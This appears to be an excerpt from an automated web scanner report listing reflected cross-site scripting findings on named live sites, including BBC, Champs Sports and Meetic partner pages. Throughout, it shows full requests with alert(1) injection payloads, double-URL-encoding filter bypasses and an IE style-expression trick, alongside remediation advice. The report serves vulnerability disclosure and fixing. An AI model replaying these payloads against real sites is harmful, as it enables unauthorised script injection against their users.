Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /worldservice/js/site_catalyst6f09e'-alert(1)-'3f555978f4d/s_code_bbcws.js?_=1312371710710 HTTP/1.1 Host: wscdn.bbc.co.uk User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://verde.br.msn.com/tubar%c3%a3o-de-500-kg-pula-dentro-de-barco-na-%c3%a1frica-do-sul-1
Response
HTTP/1.1 404 Not Found Server: Apache Accept-Ranges: bytes Content-Type: text/html Cache-Control: private, max-age=31536000 Date: Wed, 03 Aug 2011 11:42:18 GMT Content-Length: 24278 Connection: close Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB"> <head>
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0ad1'-alert(1)-'3c98025d146 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /worldservice/js/site_catalyst/s_code_bbcws.jse0ad1'-alert(1)-'3c98025d146?_=1312371710710 HTTP/1.1 Host: wscdn.bbc.co.uk User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://verde.br.msn.com/tubar%c3%a3o-de-500-kg-pula-dentro-de-barco-na-%c3%a1frica-do-sul-1
Response
HTTP/1.1 404 Not Found Server: Apache Accept-Ranges: bytes Content-Type: text/html Expires: Wed, 03 Aug 2011 11:42:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 03 Aug 2011 11:42:25 GMT Content-Length: 24278 Connection: close Vary: Accept-Encoding Set-Cookie: BBC-UID=347e8309f304b2a13c61d01581924402d7014862d0f0f2d192a8e044631c90880Mozilla%2f5%2e0%20%28Windows%3b%20U%3b%20Windows%20NT%206%2e1%3b%20en%2dUS%3b%20rv%3a1%2e9%2e2%2e13%29%20Gecko%2f20110504%20Namoroka%2f3%2e6%2e13; expires=Sun, 02-Aug-15 11:42:25 GMT; path=/; domain=bbc.co.uk;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB"> <head>
The value of REST URL parameter 4 is copied into an HTML comment. The payload 55da3%252d%252d%253e1779cf3f641 was submitted in the REST URL parameter 4. This input was echoed as 55da3-->1779cf3f641 in the application's response.
This behaviour demonstrates that it is possible to close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /catalog/productdetail/model_nbr--151878/sku--0571248755da3%252d%252d%253e1779cf3f641&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null HTTP/1.1 Host: www.champssports.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bing.com/shopping/legend-womens-t-shirt-406351/where-to-buy/C0073D641EF43AC15002?q=%3c%2fa+style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpcid=4445&lpf=0&lpq=%3c%2fa%20style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpt=clothing-shoes&FORM=CPCA&lppc=12
Response
HTTP/1.1 200 OK Server: Apache X-UA-Compatible: IE=EmulateIE7 P3P: policyref="http://www.champssports.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA" Content-Type: text/html; charset=ISO-8859-1 Vary: Accept-Encoding Content-Length: 151671 Date: Tue, 02 Aug 2011 13:15:06 GMT Connection: close Set-Cookie: SSLC=web%2D45;domain=.champssports.com;path=/ Set-Cookie: TID=6953%2D38021108142038080896706%2D0;expires=Mon, 31-Oct-2011 13:15:06 GMT;path=/ Set-Cookie: RECENTSKULIST=0571248755da3%2D%2D%3E1779cf3f641%3A151878%3AMain%2C05712487%3A151878%3AMain;path=/ Set-Cookie: TABINDEX=;expires=Mon, 02-Aug-2010 13:15:06 GMT;path=/
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63dca%2527%253balert%25281%2529%252f%252fed42f472d7a was submitted in the REST URL parameter 4. This input was echoed as 63dca';alert(1)//ed42f472d7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /catalog/productdetail/model_nbr--151878/sku--0571248763dca%2527%253balert%25281%2529%252f%252fed42f472d7a&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null HTTP/1.1 Host: www.champssports.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bing.com/shopping/legend-womens-t-shirt-406351/where-to-buy/C0073D641EF43AC15002?q=%3c%2fa+style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpcid=4445&lpf=0&lpq=%3c%2fa%20style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpt=clothing-shoes&FORM=CPCA&lppc=12
Response
HTTP/1.1 200 OK Server: Apache X-UA-Compatible: IE=EmulateIE7 P3P: policyref="http://www.champssports.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA" Content-Type: text/html; charset=ISO-8859-1 Vary: Accept-Encoding Content-Length: 151836 Date: Tue, 02 Aug 2011 13:15:03 GMT Connection: close Set-Cookie: SSLC=web%2D41;domain=.champssports.com;path=/ Set-Cookie: TID=6953%2D38021108142038080896706%2D0;expires=Mon, 31-Oct-2011 13:15:03 GMT;path=/ Set-Cookie: RECENTSKULIST=0571248763dca%27%3Balert%281%29%2F%2Fed42f472d7a%3A151878%3AMain%2C05712487%3A151878%3AMain;path=/ Set-Cookie: TABINDEX=;expires=Mon, 02-Aug-2010 13:15:03 GMT;path=/
<!-- --> <HTML xmlns:fb="http://www.facebook.com/2008/fbml"> <HEAD> <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script> <!-- web-41 --> <script type="text/javas ...[SNIP]... <!-- try { document.domain = "champssports.com"; } catch(exc){} var cm_Attributes = null; var co_cd = '20'; var thecurrentsku = '0571248763dca';alert(1)//ed42f472d7a'; var cm_ProductTemplate = null; var cm_microsite = null; var cm_ClientID = '90102184';
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4e179%2522%253balert%25281%2529%252f%252f9a08bb042a0 was submitted in the REST URL parameter 4. This input was echoed as 4e179";alert(1)//9a08bb042a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /catalog/productdetail/model_nbr--151878/sku--057124874e179%2522%253balert%25281%2529%252f%252f9a08bb042a0&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null HTTP/1.1 Host: www.champssports.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bing.com/shopping/legend-womens-t-shirt-406351/where-to-buy/C0073D641EF43AC15002?q=%3c%2fa+style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpcid=4445&lpf=0&lpq=%3c%2fa%20style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpt=clothing-shoes&FORM=CPCA&lppc=12
Response
HTTP/1.1 200 OK Server: Apache X-UA-Compatible: IE=EmulateIE7 P3P: policyref="http://www.champssports.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA" Content-Type: text/html; charset=ISO-8859-1 Vary: Accept-Encoding Content-Length: 151851 Date: Tue, 02 Aug 2011 13:15:00 GMT Connection: close Set-Cookie: SSLC=web%2D44;domain=.champssports.com;path=/ Set-Cookie: TID=6953%2D38021108142038080896706%2D0;expires=Mon, 31-Oct-2011 13:15:00 GMT;path=/ Set-Cookie: RECENTSKULIST=057124874e179%22%3Balert%281%29%2F%2F9a08bb042a0%3A151878%3AMain%2C05712487%3A151878%3AMain;path=/ Set-Cookie: TABINDEX=;expires=Mon, 02-Aug-2010 13:15:00 GMT;path=/
<!-- --> <HTML xmlns:fb="http://www.facebook.com/2008/fbml"> <HEAD> <script type="text/javascript" src="/ns/common/coradiant/tsedge_instr-min.js"> </script> <!-- web-44 --> <script type="text/javas ...[SNIP]... <script type="text/javascript"> var dtm_promo_id = "5"; var dtm_brand = "Nike"; var dtm_gender = "Women's"; var dtm_team = ""; var dtm_sku = "057124874e179";alert(1)//9a08bb042a0"; var dtm_img_url = "http://www.champssports.com/images/products/large_w/057124874e179";alert(1)//9a08bb042a0_w.jpg"; </script> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74a4e"style%3d"x%3aexpression(alert(1))"599d441c396 was submitted in the REST URL parameter 4. This input was echoed as 74a4e"style="x:expression(alert(1))"599d441c396 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /catalog/productdetail/model_nbr--151878/sku--0571248774a4e"style%3d"x%3aexpression(alert(1))"599d441c396&SID=6953&inceptor=1&cm_mmc=Affiliates-_-Feeds-_-Bing-_-null HTTP/1.1 Host: www.champssports.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bing.com/shopping/legend-womens-t-shirt-406351/where-to-buy/C0073D641EF43AC15002?q=%3c%2fa+style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpcid=4445&lpf=0&lpq=%3c%2fa%20style%3dx%3aexpre%2f%2a%2a%2fssion%28netsparker%280x00088C%29%29%3e&lpt=clothing-shoes&FORM=CPCA&lppc=12
Response
HTTP/1.1 200 OK Server: Apache X-UA-Compatible: IE=EmulateIE7 P3P: policyref="http://www.champssports.com/w3c/p3p.xml", CP="CAO CURo ADMo CONo DEVo PSAo PSDo IVAo IVDo HISo TELo OUR IND UNI NAV CNT INT ONL PUR STA" Content-Type: text/html; charset=ISO-8859-1 Vary: Accept-Encoding Content-Length: 152217 Date: Tue, 02 Aug 2011 13:14:56 GMT Connection: close Set-Cookie: SSLC=web%2D43;domain=.champssports.com;path=/ Set-Cookie: TID=6953%2D38021108142038080896706%2D0;expires=Mon, 31-Oct-2011 13:14:56 GMT;path=/ Set-Cookie: RECENTSKULIST=0571248774a4e%22style%3D%22x%3Aexpression%28alert%281%29%29%22599d441c396%3A151878%3AMain%2C05712487%3A151878%3AMain;path=/ Set-Cookie: TABINDEX=;expires=Mon, 02-Aug-2010 13:14:56 GMT;path=/
The value of the 645868;97831;0;%5btimestamp%5d;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6ad5'-alert(1)-'dc98966ff37 was submitted in the 645868;97831;0;%5btimestamp%5d;M;systemtarget parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 645868;97831;0;[timestamp];M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 888a4'-alert(1)-'09c45d96d2 was submitted in the 645868;97831;0;[timestamp];M;systemtarget parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7f93'-alert(1)-'126beb4f879 was submitted in the 645868;97831;6855282135832214373;%5btimestamp%5d;M;systemtarget parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
2.171. http://www.meetic-partners.com/a/diff/58/645868/ishow23.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.meetic-partners.com
Path:
/a/diff/58/645868/ishow23.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8248'-alert(1)-'61f5f4b6355 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 673819;97831;6525761750539601382;109706383;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f36f5'%3balert(1)//fa7f3485bd6 was submitted in the 673819;97831;6525761750539601382;109706383;M;systemtarget parameter. This input was echoed as f36f5';alert(1)//fa7f3485bd6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 673819;97831;6525761750539601382;247433133;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba096'%3balert(1)//f4996b0af5e was submitted in the 673819;97831;6525761750539601382;247433133;M;systemtarget parameter. This input was echoed as ba096';alert(1)//f4996b0af5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 673819;97831;6525761750539601382;392249101;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac38b'%3balert(1)//2aea9aa7199 was submitted in the 673819;97831;6525761750539601382;392249101;M;systemtarget parameter. This input was echoed as ac38b';alert(1)//2aea9aa7199 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 673819;97831;6525761750539601382;517804283;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9689'%3balert(1)//10e068cb7a5 was submitted in the 673819;97831;6525761750539601382;517804283;M;systemtarget parameter. This input was echoed as f9689';alert(1)//10e068cb7a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 673819;97831;6525761750539601382;877134046;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc8a8'%3balert(1)//420a2dc5e99 was submitted in the 673819;97831;6525761750539601382;877134046;M;systemtarget parameter. This input was echoed as bc8a8';alert(1)//420a2dc5e99 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:57:51 GMT Connection: close
var innerCode='';
function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"] ...[SNIP]... <a target="_blank" href="http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href=bc8a8';alert(1)//420a2dc5e99http://www.meetic-partners.com/diff/58/673819/go138.asp?673819%3B97831%3B6525761750539601382%3B877134046%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2 ...[SNIP]...
2.177. http://www.meetic-partners.com/a/diff/58/673819/show27.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.meetic-partners.com
Path:
/a/diff/58/673819/show27.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d307'%3balert(1)//4f318aba3f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2d307';alert(1)//4f318aba3f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the 712921;97831;6525761750539601382;512842640;M;systemtarget request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 807e5'%3balert(1)//5a3c5d05240 was submitted in the 712921;97831;6525761750539601382;512842640;M;systemtarget parameter. This input was echoed as 807e5';alert(1)//5a3c5d05240 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 13:03:54 GMT Connection: close
var innerCode='';
function navigatorFlashVersion(){navigatorFlashVersion.gfp=function(){var v=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"] ...[SNIP]... <a target="_blank" href="http://clk.atdmt.com/go/279209217/direct;wi.300;hi.250;01;ai.190623324.161912770;ct.1/01?href=807e5';alert(1)//5a3c5d05240http://www.meetic-partners.com/diff/58/712921/go126.asp?712921%3B97831%3B6525761750539601382%3B512842640%3BM%3Bsystemtarget=%24a%3D0t%3B%24cn%3D0_0%3B%24isp%3D0%3B%24qc%3D1309090337%3B%24ql%3Dhigh%3B%2 ...[SNIP]...
2.179. http://www.meetic-partners.com/a/diff/58/712921/show27.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.meetic-partners.com
Path:
/a/diff/58/712921/show27.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54e29'%3balert(1)//0a8e37c0325 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54e29';alert(1)//0a8e37c0325 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2b0e'-alert(1)-'20c938f2fb was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]d2b0e'-alert(1)-'20c938f2fb/no?[countgo] HTTP/1.1 Host: www.meetic-partners.com Proxy-Connection: keep-alive Referer: http://dating.uk.msn.com/?articleid=10325 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: text/html Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Wed, 03 Aug 2011 12:38:41 GMT Content-Length: 584
The value of the [countgo] request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2d69'-alert(1)-'bcda5d97f29 was submitted in the [countgo] parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no?[countgo]f2d69'-alert(1)-'bcda5d97f29 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://dating.uk.msn.com/?articleid=10325
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:38:20 GMT
Content-Length: 611
2.182. http://www.meetic-partners.com/call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d4e6'-alert(1)-'76bbbc117a2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /call/adif/97831/645868/MSN_uk.meeticcorp/307x282/[timestamp]/no?[countgo]&2d4e6'-alert(1)-'76bbbc117a2=1 HTTP/1.1
Host: www.meetic-partners.com
Proxy-Connection: keep-alive
Referer: http://dating.uk.msn.com/?articleid=10325
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Expires: Mon, 31 Dec 1979 23:00:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 03 Aug 2011 12:38:31 GMT
Content-Length: 614
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff0a7'-alert(1)-'280b8200956 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 836c5'-alert(1)-'8ada2bb0818 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 701ed'%3balert(1)//28f11ddf22f was submitted in the http://clk.atdmt.com/go/115855006/direct;wi.300;hi.250;01;ai.197578039.152638442;ct.2/01?href parameter. This input was echoed as 701ed';alert(1)//28f11ddf22f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
